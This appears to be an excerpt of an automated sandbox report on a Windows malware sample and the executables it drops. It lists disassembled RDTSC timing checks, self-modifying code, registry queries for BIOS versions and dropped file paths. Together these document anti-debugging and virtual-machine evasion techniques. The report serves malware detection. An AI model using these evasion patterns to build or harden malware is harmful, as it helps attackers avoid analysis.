Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58908D7 second address: 5890926 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE605Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c jmp 00007FE66CCE6060h 0x00000011 ror eax, cl 0x00000013 jmp 00007FE66CCE6060h 0x00000018 leave 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FE66CCE6067h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5890926 second address: 589092C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 589092C second address: 5890930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5890930 second address: 5890944 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c mov esi, eax 0x0000000e lea eax, dword ptr [ebp-08h] 0x00000011 xor esi, dword ptr [00F32014h] 0x00000017 push eax 0x00000018 push eax 0x00000019 push eax 0x0000001a lea eax, dword ptr [ebp-10h] 0x0000001d push eax 0x0000001e call 00007FE671955851h 0x00000023 push FFFFFFFEh 0x00000025 pushad 0x00000026 mov ah, dl 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5890944 second address: 5890948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5890948 second address: 589097A instructions: 0x00000000 rdtsc 0x00000002 mov ax, 1A51h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop eax 0x0000000a jmp 00007FE66CFB4FDCh 0x0000000f ret 0x00000010 nop 0x00000011 push eax 0x00000012 call 00007FE67195586Eh 0x00000017 mov edi, edi 0x00000019 pushad 0x0000001a mov si, B0FDh 0x0000001e mov ch, 5Fh 0x00000020 popad 0x00000021 push esi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FE66CFB4FDCh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 589097A second address: 5890980 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5890980 second address: 5890986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5890986 second address: 589098A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 589098A second address: 589098E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 589098E second address: 58909F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FE66CCE6064h 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FE66CCE605Eh 0x00000019 add eax, 5B334298h 0x0000001f jmp 00007FE66CCE605Bh 0x00000024 popfd 0x00000025 push ecx 0x00000026 call 00007FE66CCE605Fh 0x0000002b pop ecx 0x0000002c pop ebx 0x0000002d popad 0x0000002e pop ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FE66CCE605Eh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58909F7 second address: 58909FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58909FD second address: 5890A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5890A03 second address: 5890A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 584001B second address: 584006C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE66CCE605Fh 0x00000009 add ch, 0000003Eh 0x0000000c jmp 00007FE66CCE6069h 0x00000011 popfd 0x00000012 mov edx, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE66CCE6069h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 584006C second address: 58400F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE66CFB4FE1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FE66CFB4FDCh 0x00000017 and cx, CDF8h 0x0000001c jmp 00007FE66CFB4FDBh 0x00000021 popfd 0x00000022 push esi 0x00000023 pushfd 0x00000024 jmp 00007FE66CFB4FDFh 0x00000029 or ecx, 669A89BEh 0x0000002f jmp 00007FE66CFB4FE9h 0x00000034 popfd 0x00000035 pop ecx 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FE66CFB4FDAh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58400F4 second address: 5840106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE66CCE605Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5840106 second address: 584015E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e pushad 0x0000000f call 00007FE66CFB4FE4h 0x00000014 pushfd 0x00000015 jmp 00007FE66CFB4FE2h 0x0000001a xor eax, 04005778h 0x00000020 jmp 00007FE66CFB4FDBh 0x00000025 popfd 0x00000026 pop eax 0x00000027 mov bh, 02h 0x00000029 popad 0x0000002a xchg eax, ecx 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e mov al, A4h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 584015E second address: 584019E instructions: 0x00000000 rdtsc 0x00000002 mov ah, bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FE66CCE6067h 0x0000000d xchg eax, ecx 0x0000000e pushad 0x0000000f jmp 00007FE66CCE6064h 0x00000014 movzx eax, di 0x00000017 popad 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 584019E second address: 58401A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58401A2 second address: 58401A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58401A8 second address: 58401E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 mov eax, 76BE244Fh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebx 0x00000011 jmp 00007FE66CFB4FE2h 0x00000016 mov ebx, dword ptr [ebp+10h] 0x00000019 jmp 00007FE66CFB4FE0h 0x0000001e xchg eax, esi 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58401E5 second address: 58401E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58401E9 second address: 58401ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58401ED second address: 58401F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58401F3 second address: 5840283 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FE66CFB4FDBh 0x0000000f xchg eax, esi 0x00000010 jmp 00007FE66CFB4FE6h 0x00000015 mov esi, dword ptr [ebp+08h] 0x00000018 jmp 00007FE66CFB4FE0h 0x0000001d xchg eax, edi 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FE66CFB4FDEh 0x00000025 add cx, 9F48h 0x0000002a jmp 00007FE66CFB4FDBh 0x0000002f popfd 0x00000030 jmp 00007FE66CFB4FE8h 0x00000035 popad 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5840283 second address: 5840289 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5840289 second address: 584028E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 584028E second address: 58402D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FE66CCE605Bh 0x0000000a and cx, DEEEh 0x0000000f jmp 00007FE66CCE6069h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FE66CCE605Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58402D0 second address: 58402E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE66CFB4FDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58402E0 second address: 58402F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE605Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58402F9 second address: 5840314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FE7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5840314 second address: 584032C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE66CCE6064h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 584032C second address: 58403CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FE6DECE32B7h 0x0000000e jmp 00007FE66CFB4FE7h 0x00000013 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001a pushad 0x0000001b jmp 00007FE66CFB4FE4h 0x00000020 mov dx, cx 0x00000023 popad 0x00000024 je 00007FE6DECE3290h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FE66CFB4FE9h 0x00000033 and ecx, 64C9C606h 0x00000039 jmp 00007FE66CFB4FE1h 0x0000003e popfd 0x0000003f pushfd 0x00000040 jmp 00007FE66CFB4FE0h 0x00000045 sbb ch, FFFFFFA8h 0x00000048 jmp 00007FE66CFB4FDBh 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58403CD second address: 58403D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58403D3 second address: 58403D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58403D7 second address: 5840445 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b jmp 00007FE66CCE6067h 0x00000010 or edx, dword ptr [ebp+0Ch] 0x00000013 jmp 00007FE66CCE6066h 0x00000018 test edx, 61000000h 0x0000001e pushad 0x0000001f mov cl, D4h 0x00000021 mov bx, 6FFEh 0x00000025 popad 0x00000026 jne 00007FE6DEA142BEh 0x0000002c jmp 00007FE66CCE6065h 0x00000031 test byte ptr [esi+48h], 00000001h 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5840445 second address: 5840458 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5840458 second address: 5840497 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE6069h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FE6DEA14282h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FE66CCE6068h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5840497 second address: 58404A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58404A6 second address: 58404AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58404AC second address: 58404B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58404B0 second address: 58404B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58404B4 second address: 58404C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test bl, 00000007h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov cx, bx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5830733 second address: 583074C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE605Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 583074C second address: 5830769 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CFB4FE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5830769 second address: 583078D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE66CCE6061h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE66CCE605Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 583078D second address: 5830792 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 5830792 second address: 58307B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 14C6FD12h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ax, 16D1h 0x00000014 jmp 00007FE66CCE605Eh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58307B5 second address: 58307E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE66CFB4FE1h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007FE66CFB4FDCh 0x00000014 and esp, FFFFFFF8h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	RDTSC instruction interceptor: First address: 58307E5 second address: 58307E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Special instruction interceptor: First address: F3EBDC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Special instruction interceptor: First address: 10DA388 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Special instruction interceptor: First address: F3C2BA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Special instruction interceptor: First address: 116BBB5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 4BEBDC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 65A388 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 4BC2BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 6EBBB5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Special instruction interceptor: First address: 106FDA1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Special instruction interceptor: First address: 121413C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Special instruction interceptor: First address: 1212848 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Special instruction interceptor: First address: 121B741 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Special instruction interceptor: First address: 129EAB1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Special instruction interceptor: First address: CAD8BA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Special instruction interceptor: First address: E539CE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Special instruction interceptor: First address: EEA7CE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Special instruction interceptor: First address: CB4B8B instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Memory allocated: 2B70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Memory allocated: 2E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Memory allocated: 2B70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Memory allocated: 1100000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Memory allocated: 2C00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Memory allocated: 2A10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Memory allocated: 1650000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Memory allocated: 2F00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Memory allocated: 4F00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Memory allocated: 5660000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Memory allocated: 5900000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Memory allocated: 5700000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe	Memory allocated: 9D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe	Memory allocated: 2680000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\1085382001\7aencsM.exe	Memory allocated: 2580000 memory reserve \| memory write watch

Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\hHtR1O06GH.exe

Code function: 0_2_058B0804 rdtsc

0_2_058B0804

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 653	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 745	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 710	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 744	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 748	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 758	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 794	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 807	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Window / User API: threadDelayed 2157	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4598
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2211
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2554
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2920
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 769
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1378

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\DTQCxXZ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1085388001\d2YQIJa.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1085389001\Bjkm5hE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Bjkm5hE[1].exe	Jump to dropped file
